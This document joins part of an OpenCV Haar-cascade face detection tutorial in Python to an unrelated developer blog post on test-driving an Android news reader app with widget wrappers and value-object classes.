import matplotlib.pyplot as plt
%matplotlib inline

We shall be using the image below:

# Converting to grayscale
test_image_gray = cv2.cvtColor(test_image, cv2.COLOR_BGR2GRAY)

# Displaying the grayscale image
plt.imshow(test_image_gray, cmap='gray')

Since we know that OpenCV loads an image in BGR format, we need to convert it into RGB format to be able to display its true colours. Let us write a small function for that:

def convertToRGB(image):
    return cv2.cvtColor(image, cv2.COLOR_BGR2RGB)

Haar cascade files

OpenCV comes with a lot of pre-trained classifiers. For instance, there are classifiers for smiles, eyes, faces, etc. These come in the form of XML files and are located in the folder opencv/data/haarcascades/. However, to make things simple, you can also access them from here. Download the XML files and place them in a data folder in the same working directory as the Jupyter notebook.
haar_cascade_face = cv2.CascadeClassifier('data/haarcascade/haarcascade_frontalface_default.xml')

Face detection

We shall be using the detectMultiScale method of the classifier. This function returns a rectangle with coordinates (x, y, w, h) around each detected face. It has two important parameters which have to be tuned according to the data:

- scaleFactor: In a group photo, some faces may be nearer to the camera than others, and such faces appear more prominent than the ones behind. This factor compensates for that.
- minNeighbors: This parameter specifies the number of neighbours a candidate rectangle should have to be called a face. You can read more about it here.

faces_rects = haar_cascade_face.detectMultiScale(test_image_gray, scaleFactor=1.2, minNeighbors=5)

# Let us print the no. of faces found
print('Faces found: ', len(faces_rects))

Faces found: 1

Our next step is to loop over all the coordinates it returned and draw rectangles around them using OpenCV. We will be drawing a green rectangle with a thickness of 2:

for (x, y, w, h) in faces_rects:
    cv2.rectangle(test_image, (x, y), (x+w, y+h), (0, 255, 0), 2)

Finally, we shall display the original image in colour to see if the face has been detected correctly or not:

# convert image to RGB and show image
plt.imshow(convertToRGB(test_image))

Here it is. We have successfully detected the face of the baby in the picture. Let us now create a generalized function for the entire face detection process.

Face Detection with a generalized function

def detect_faces(cascade, test_image, scaleFactor=1.1):
    # create a copy of the image to prevent any changes to the original one
    image_copy = test_image.copy()

    # convert the test image to grayscale, as the OpenCV face detector expects gray images
    gray_image = cv2.cvtColor(image_copy, cv2.COLOR_BGR2GRAY)

    # apply the Haar classifier to detect faces
    faces_rect = cascade.detectMultiScale(gray_image, scaleFactor=scaleFactor, minNeighbors=5)

    for (x, y, w, h) in faces_rect:
        cv2.rectangle(image_copy, (x, y), (x+w, y+h), (0, 255, 0), 15)

    return image_copy

Testing the function on a new image

This time the test image is as follows:

# Converting to grayscale
test_image_gray = cv2.cvtColor(test_image2, cv2.COLOR_BGR2GRAY)

# Displaying grayscale image
plt.imshow(test_image_gray, cmap='gray')

# call the function to detect faces
faces = detect_faces(haar_cascade_face, test_image2)

# convert to RGB and display image
plt.imshow(convertToRGB(faces))

Testing the function on a group image

Let us now see if the function works well on a group photograph. We shall be using the picture below for our purpose. PC: The Indian Women's Cricket Team.

# call the function to detect faces
faces = detect_faces(haar_cascade_face, test_image2)

# convert to RGB and display image
plt.imshow(convertToRGB(faces))

You can access the entire source code from here.

Conclusion

In this tutorial, we learned about the concept of face detection using OpenCV in Python with the Haar cascade. There are a number of detectors other than the face detector in the library. Feel free to experiment with them and create detectors for eyes, license plates, etc.
I've thought a bit about my TDD limitations on Android and my discovery of the GoLang-y nature of interfaces. For the TopStoriesAdapter.ViewHolder to be tested, we can create a wrapper for other controls... Now I understand why Android didn't do it originally: performance; TDD was new... Lots of stuff.

Sooo.... I think I'm going to be developing my own set of Widgets with a growing interface (not doing it sweeping). It should enable TDD... but it'll also create a ton of "crap". I don't really think this will be a recommended path for production code, where I'd recommend minimizing UI-bound code, testing what can be tested via unit tests, and UI-testing the rest. This isn't production; this is me getting to do things my way. And... wow, it's a bit of a round and round to get just the RecyclerView interfaced up.

Ruthless Refactoring

I'm running tests to fix up some code coverage. ... I didn't TDD a piece... :( My failure to have TDD'd a chunk of code caused 3 tests to fail when I got test coverage improved. This didn't change the production code; it just modified the behavior of the tests, which broke 3 when I fixed 1. This shows that TDD makes even TESTS more robust... ... Yea... TDD makes TESTS better...

I continue to make myself suffer the pangs of unpaired (and, let's be honest, poor) TDD, as it SO VERY PAINFULLY shows the power of pairing and TDD. Lessons I won't forget, as it beats the importance of the practices into my head...

Excluding the Activities, wrapper-widgets, and unimplemented failure paths, I have 100/100 code coverage on all things except one... The Adapter. Which... kinda makes sense, since that's what I spent a bunch of time writing wrapper classes for... before getting distracted by some RUTHLESS REFACTORING!!!

Testing The Adapter

The adapter needs testing. It needed a few wrapper classes. All of them so far, actually. I'd actually never thought to test the Adapter. Well.... I thought to; then thought; <whiny>but it's UI; that's hard to test.
I can justify not doing it. UI is a boundary; it's OK</whiny>

In the end: no. It's not OK to "not test". YES, there are exceptions; YES, you won't get 100/100 for EVERYTHING (nor should you REALLY care). But "hard" isn't a reason not to test. Challenging isn't a reason not to test.

The adapter isn't really a UI anyway. It's just extending an Android control which isn't testable. Which, BTW, Google - FOR SHAME! The RecyclerView is plenty new that good practices should have been applied!!! I don't even have a null guard on the adapter... DEEP SIGH ... I'm better than that... I think/hope. :)

I'm working through some tests on the Adapter; I think I need to get the ViewHolder down first...

Holy hell... OK - I have a few widget wrappers... and the RecyclerView is wrapped... and with all the code updated to use these controls... I ran it... and ... it... uhh... Worked. Honestly, I did not expect that.

Now - Classes!!!

Since the UI wrapping works... I can start writing the backend code... yea... ... It makes sense. I've been adding some of the classes to support the additional information in the StoryJson. Through this process I found a lot of commonality in the "Primitive Wrapper" classes. Which means I did a bunch of Copy & Paste. I extracted the commonality into what I expect will grow into a nice collection of ObjectOrientedDesign base classes. I hope, anyway. That way I have a structure to help direct my building.

In my refactor and wrapping of the UI, I have the QacTextView with the setText method, but I dislike the implied "UI Widget" being part of some baser classes. With a "SetText" interface with a "setText" method... we're starting to get into "mix-in" territory. I'll be keeping an eye on this kind of functionality to see if it can refactor into something with jargon. I see some more common behavior in the duplicated code that may be simplified in another way besides the SimpleWrapper... Gotta keep it in mind; but I don't have a good solution yet.
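For the curious, here is a rough Python analogue of the pattern being described: a SimpleWrapper-style value object with a validate hook, pushing its value through a narrow SetText-like interface. The names mirror the post, but the sketch is mine, not the project's actual Java code:

```python
class SimpleWrapper:
    """Value-object base: validate on construction, never hand the raw value out."""
    def __init__(self, value):
        self.validate(value)
        self._value = value

    def validate(self, value):
        """Hook for subclasses; the base class accepts anything."""
        pass

    def into(self, target):
        """Push the value into anything with a set_text method (no getter exposed)."""
        if target is None:
            return
        target.set_text(self._value)

class Author(SimpleWrapper):
    def validate(self, value):
        if not value:
            raise ValueError("author can not be null")

class FakeTextView:
    """Test double standing in for a UI widget."""
    def __init__(self):
        self.text = None
    def set_text(self, text):
        self.text = text

widget = FakeTextView()
Author("pat").into(widget)
print(widget.text)  # pat
```

The point of the shape: Author never exposes a getter, and nothing in it depends on a real widget class; any test double with a set_text method will do.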
Unholy Hell

I made the UI wrapping stuff to be able to pass in mocked versions of the UI... Something I'd used in the past wasn't working. I didn't think much about it; I thought I had everything correct. I didn't. I think I'll have to roll back the wrapping changes. A fantastic learning experience; but... I don't think it is the correct path moving forward. I've been wondering what I was missing such that the wrapping has never come up before - I found it: just use byte manipulation to rip out the final stuff. Instead of making progress... refactor out the stuff I refactored in! Weeee...

Waste of Time

Were the changes trying to wrap the UI a waste of time? No. Absolutely not. I learned things. The Law of Two Feet says that if I feel I was learning, then it's an appropriate course of action to be on. I learned a new thing about Java. I explored it. It has potential in some situations. I'm actually exploring using it in a more confined role: in my Object classes, like Author.

public class Author extends SimpleWrapper<String> {
    public final static Author NullAuthor = new Author("{{ Loading Author }}");

    public Author(final String author) {
        super(author);
    }

    @Override
    protected void validate(final String author) {
        if (Strings.isNullOrEmpty(author)) {
            throw new IllegalArgumentException("author can not be null");
        }
    }

    public void authorInto(final SetText item) {
        if (item == null) { return; }
        item.setText(value());
    }
}

In particular, the authorInto (name in flux) method:

public void authorInto(final SetText item) {
    if (item == null) { return; }
    item.setText(value());
}

SetText is an interface with a signature matching TextView#setText (creative naming; right?). This allows an object to have no dependency on UI widgets, but still be able to interact with them. This was the first interface I made for wrapping, to do exactly this. As expanding to all controls is kinda out, I want to keep it in this limited focus to allow interactions without the UI dependency. Will it work?
No idea. Should be fun to find out.

...

I've been trying to write tests for the ViewHolder. I've been writing code towards this goal for about 12 hours. I still have no tests. Upside: I don't feel any of it is wasted. A lot of learning and a better understanding. Plus a solid grasp of the technique I'm going to apply to be able to test effectively. I'm now set up to save hours whenever I encounter this type of situation again. 12 hours consumed, but uncountable hours saved from being able to test UI components... in theory. Gotta actually prove I can write those tests now.

...

Early results seem to support the wrapping for controls which get content set.

...

Continued work shows that the SetText interface keeps the class API clean. There's no "UI Widget" in a "data bag" (not really a data bag, but close enough for now).

...

Looking at setting up a "# [minutes|hours|days] ago" display and being lazy about doing the calculations ('cause someone's figured it out already), I found that Android already has this via android.text.format.DateUtils, specifically the getRelativeTimeSpanString method. I was implementing a translation from unix time to a Date object, but since that method takes longs, it looks like I can skip that piece.

...

Frack... DateUtils is a stubbed implementation. This does free us from some things, because we can assume that it works; we don't need to test it. We do need to wrap it, though. It's an instance, much like the use of LayoutManager#from in the TopStoriesAdapter, that is tightly coupled to Android. We need to break this coupling. These are boundary points of the app, which often require the exceptions that prove the rule. I'll address the DateUtils first... by which I mean I'm going to frown at the fact that Google's gone the route of a static method... This is non-trivial to work around. Once I spend some time on it, we'll see how hard it is. I'll need this same approach for the LayoutManager.
I understand using them in the early days (DateUtils was added in API 3), when there was significant concern over speed and memory, which a bunch of extra class instances would have affected... but it's just a constraint working against better development practices now.

FyzLog'd

My refactor work for logging in Android is being applied here. I'm creating a wrapper around the Android DateUtils and creating slugs which I can flip from tests to do something different, but still something. It's clean; a bit odd, which I've been freely admitting. It's a boundary that can't be TDD'd otherwise. It's a requirement due to the limitations forced by the Android OS.

YAGNI

For the StoryComments, I'd included StoryId in the constructor because I'll need it... later. I ripped that out. It was sitting there doing nothing, and I had to re-arrange some code to test something else. An unused piece of code was making me re-write and write differently... That's a paddling; now it's gone.

Working

All of the Story properties are being populated and displayed. This took a bit of working through setting up all the Objects representing them. I'm really happy with all the work that's gone into setting up the UI testability. While I still need to approach this with the Activity, the Adapter is looking amazing. The TopStoriesAdapter, which was at about 0% for method coverage and line coverage, is now at 100% for both.

I said I'd need to re-work the LayoutManager so the Adapter isn't tightly bound to it; ehhh.... I'm gonna hold off on it for now. The only thing to test is either implementation or effects that would crash the app when running. The boundaries get a little flexibility; here's one I'm going to flex on.

All the data is loading. FULL DATA ACHIEVED!

Learning Happened

I feel I have gotten a lot of value out of working through this post. More than any other so far. There are some major points that stand out to me from everything I did through this post.
They all fall into the "Object Oriented Design" bucket.

I've mentioned earlier in this post series how I want to enforce encapsulation and not be returning data. This is in direct conflict with not polluting a class with dependencies on UI widgets. I found a way to satisfy both. While the interface is UI-centric right now, it's easily adjusted. The usage of the wrapping class allows us to change the interface to something that isn't a signature match to UI widgets. setAsString? Sure. Now it's just a naming issue... and sometimes I'd rather work on caching. The encapsulation I've been striving to find a satisfying answer to... done. I'm very pleased with this result. I think it'll be a hard sell because "it's not default controls"... Well... I have to fight for encapsulation first. :)

The encapsulation ties into the other aspect of Object Oriented Design: it massively simplifies the code. Ifs exist only as guard clauses. This will change once I show why I call part of the pattern a Mediator. The DateUtils adjustment at the end demonstrates the power of the design patterns to remove the need for branching logic. If there's any desire to read up on the process I went through with that, read the Logger Refactor series.

An additional simplification of the code from using a lot of objects is allowing each object to focus on a single thing. This is the "Single Responsibility" principle that people think they follow. In this case, the Story class knows only about the "Story" concept. It knows it needs a "title" but not what makes a title a title. Just that when it's built, it can't be null. Story doesn't know that the value inside a Title can't be null or empty:

    public class Title ...

        @Override
        protected void validate(final String input) {
            if (Strings.isNullOrEmpty(input)) {
                throw new IllegalArgumentException("title can not be null or empty");
            }
        }

Story doesn't need to know anything about how time is calculated and any conversions that need to occur. UnixTime?
Why would a Story need to know UnixTime?! The correct answer is, "It doesn't". We've facilitated this by having a PostTime class with the Single Responsibility of knowing how to take in the UnixTime and display it later.

I'm noticing there's some common behavior between classes where a MixIn approach might simplify things. I don't have enough examples demonstrating where it would make an improvement, which means that change must be held off.

While not the longest in the series so far, I feel I've learned the most from this one. I'm really pleased about that.
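As a closing sketch, this is roughly the shape the PostTime idea takes. The names and the injected-formatter detail are assumptions for illustration, not the project's actual code:

```java
import java.util.function.LongFunction;

// Hypothetical PostTime value class: it alone owns the unix-time concept,
// so Story never has to know about epochs or conversions.
class PostTime {
    private final long unixTimeSeconds;

    PostTime(final long unixTimeSeconds) {
        this.unixTimeSeconds = unixTimeSeconds;
    }

    // The relative-time formatter is injected: production can delegate to
    // DateUtils.getRelativeTimeSpanString (which takes millis), while tests
    // pass a deterministic function instead.
    String display(final LongFunction<String> relativeFormatter) {
        return relativeFormatter.apply(unixTimeSeconds * 1000L);
    }
}
```

The unix-to-millis conversion lives here and nowhere else; Story just holds a PostTime and asks it to display itself.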
https://quinngil.com/2017/03/12/vbm-on-android-top-stories-full-data/